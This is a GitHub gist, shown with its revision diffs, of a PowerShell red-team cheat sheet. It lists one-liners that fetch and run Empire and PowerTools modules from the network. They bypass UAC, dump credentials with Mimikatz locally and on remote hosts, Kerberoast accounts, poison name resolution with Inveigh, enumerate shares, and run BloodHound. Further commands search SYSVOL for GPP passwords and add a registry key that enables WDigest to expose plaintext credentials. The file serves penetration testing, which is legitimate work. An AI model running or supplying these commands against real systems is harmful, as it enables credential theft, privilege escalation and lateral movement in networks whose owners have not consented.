Skip to content

Instantly share code, notes, and snippets.

@talshimoni
Forked from jivoi/RedTeam_CheatSheet.ps1
Created July 26, 2019 21:44

Revisions

  1. @m8sec m8sec revised this gist Jul 12, 2018. 1 changed file with 1 addition and 2 deletions.
    3 changes: 1 addition & 2 deletions RedTeam_CheatSheet.ps1
    Original file line number Diff line number Diff line change
    @@ -1,6 +1,5 @@
    # Description:
    # Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages
    # of testing.
    # Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.

    # Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command]
    powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'"
  2. @m8sec m8sec revised this gist Jul 12, 2018. 1 changed file with 6 additions and 3 deletions.
    9 changes: 6 additions & 3 deletions RedTeam_CheatSheet.ps1
    Original file line number Diff line number Diff line change
    @@ -8,6 +8,9 @@ powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('h
    # Invoke-Mimikatz: Dump credentials from memory
    powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"

    # Import Mimikatz Module to run further commands
    powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1')"

    # Invoke-MassMimikatz: Use to dump creds on remote host [replace $env:computername with target server name(s)]
    powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PewPewPew/Invoke-MassMimikatz.ps1');'$env:COMPUTERNAME'|Invoke-MassMimikatz -Verbose"

    @@ -20,12 +23,12 @@ powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('h
    # Invoke-Kerberoast and provide Hashcat compatible hashes
    powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1');Invoke-kerberoast -OutputFormat Hashcat"

    # Import PowerView
    powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1')"

    # Invoke-ShareFinder and print output to file
    powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1');Invoke-ShareFinder -CheckShareAccess|Out-File -FilePath sharefinder.txt"

    # Import PowerView Module to run further commands
    powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1')"

    # Invoke-Bloodhound
    powershell.exe -exec Bypass -C "IEX(New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1');Invoke-BloodHound"

  3. @m8sec m8sec revised this gist Jul 12, 2018. 1 changed file with 10 additions and 7 deletions.
    17 changes: 10 additions & 7 deletions RedTeam_CheatSheet.ps1
    Original file line number Diff line number Diff line change
    @@ -9,26 +9,29 @@ powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('h
    powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"

    # Invoke-MassMimikatz: Use to dump creds on remote host [replace $env:computername with target server name(s)]
    powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PewPewPew/Invoke-MassMimikatz.ps1');'$env:COMPUTERNAME'|Invoke-MassMimikatz -Verbose"
    powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PewPewPew/Invoke-MassMimikatz.ps1');'$env:COMPUTERNAME'|Invoke-MassMimikatz -Verbose"

    # PowerUp: Privilege escalation checks
    powershell -exec bypass -C IEX (New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1’);Invoke-AllChecks
    powershell.exe -exec Bypass -C IEX (New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1’);Invoke-AllChecks

    # Invoke-Inveigh and log output to file
    powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/master/Scripts/Inveigh.ps1');Invoke-Inveigh -ConsoleOutput Y –NBNS Y –mDNS Y –Proxy Y -LogOutput Y -FileOutput Y"
    powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/master/Scripts/Inveigh.ps1');Invoke-Inveigh -ConsoleOutput Y –NBNS Y –mDNS Y –Proxy Y -LogOutput Y -FileOutput Y"

    # Invoke-Kerberoast and provide Hashcat compatible hashes
    powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1');Invoke-kerberoast -OutputFormat Hashcat"
    powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1');Invoke-kerberoast -OutputFormat Hashcat"

    # Import PowerView
    powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1')"

    # Invoke-ShareFinder and print output to file
    powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1');Invoke-ShareFinder -CheckShareAccess|Out-File -FilePath sharefinder.txt"
    powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1');Invoke-ShareFinder -CheckShareAccess|Out-File -FilePath sharefinder.txt"

    # Invoke-Bloodhound
    powershell.exe -exec bypass -C "IEX(New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1');Invoke-BloodHound"
    powershell.exe -exec Bypass -C "IEX(New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1');Invoke-BloodHound"

    # Find GPP Passwords in SYSVOL
    findstr /S cpassword $env:logonserver\sysvol\*.xml
    findstr /S cpassword %logonserver%\sysvol\*.xml
    findstr /S cpassword %logonserver%\sysvol\*.xml (cmd.exe)

    # Run Powershell prompt as a different user, without loading profile to the machine [replace DOMAIN and USER]
    runas /user:DOMAIN\USER /noprofile powershell.exe
  4. @m8sec m8sec revised this gist Jul 12, 2018. 1 changed file with 3 additions and 0 deletions.
    3 changes: 3 additions & 0 deletions RedTeam_CheatSheet.ps1
    Original file line number Diff line number Diff line change
    @@ -2,6 +2,9 @@
    # Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages
    # of testing.

    # Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command]
    powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'"

    # Invoke-Mimikatz: Dump credentials from memory
    powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"

  5. @m8sec m8sec revised this gist Jul 12, 2018. 1 changed file with 1 addition and 0 deletions.
    1 change: 1 addition & 0 deletions RedTeam_CheatSheet.ps1
    Original file line number Diff line number Diff line change
    @@ -25,6 +25,7 @@ powershell.exe -exec bypass -C "IEX(New-Object Net.Webclient).DownloadString('ht

    # Find GPP Passwords in SYSVOL
    findstr /S cpassword $env:logonserver\sysvol\*.xml
    findstr /S cpassword %logonserver%\sysvol\*.xml

    # Run Powershell prompt as a different user, without loading profile to the machine [replace DOMAIN and USER]
    runas /user:DOMAIN\USER /noprofile powershell.exe
  6. @m8sec m8sec created this gist Jul 12, 2018.
    34 changes: 34 additions & 0 deletions RedTeam_CheatSheet.ps1
    Original file line number Diff line number Diff line change
    @@ -0,0 +1,34 @@
    # Description:
    # Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages
    # of testing.

    # Invoke-Mimikatz: Dump credentials from memory
    powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"

    # Invoke-MassMimikatz: Use to dump creds on remote host [replace $env:computername with target server name(s)]
    powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PewPewPew/Invoke-MassMimikatz.ps1');'$env:COMPUTERNAME'|Invoke-MassMimikatz -Verbose"

    # PowerUp: Privilege escalation checks
    powershell -exec bypass -C IEX (New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1’);Invoke-AllChecks

    # Invoke-Inveigh and log output to file
    powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/master/Scripts/Inveigh.ps1');Invoke-Inveigh -ConsoleOutput Y –NBNS Y –mDNS Y –Proxy Y -LogOutput Y -FileOutput Y"

    # Invoke-Kerberoast and provide Hashcat compatible hashes
    powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1');Invoke-kerberoast -OutputFormat Hashcat"

    # Invoke-ShareFinder and print output to file
    powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1');Invoke-ShareFinder -CheckShareAccess|Out-File -FilePath sharefinder.txt"

    # Invoke-Bloodhound
    powershell.exe -exec bypass -C "IEX(New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1');Invoke-BloodHound"

    # Find GPP Passwords in SYSVOL
    findstr /S cpassword $env:logonserver\sysvol\*.xml

    # Run Powershell prompt as a different user, without loading profile to the machine [replace DOMAIN and USER]
    runas /user:DOMAIN\USER /noprofile powershell.exe

    # Insert reg key to enable Wdigest on newer versions of Windows
    reg add HKLM\SYSTEM\CurrentControlSet\Contro\SecurityProviders\Wdigest /v UseLogonCredential /t Reg_DWORD /d 1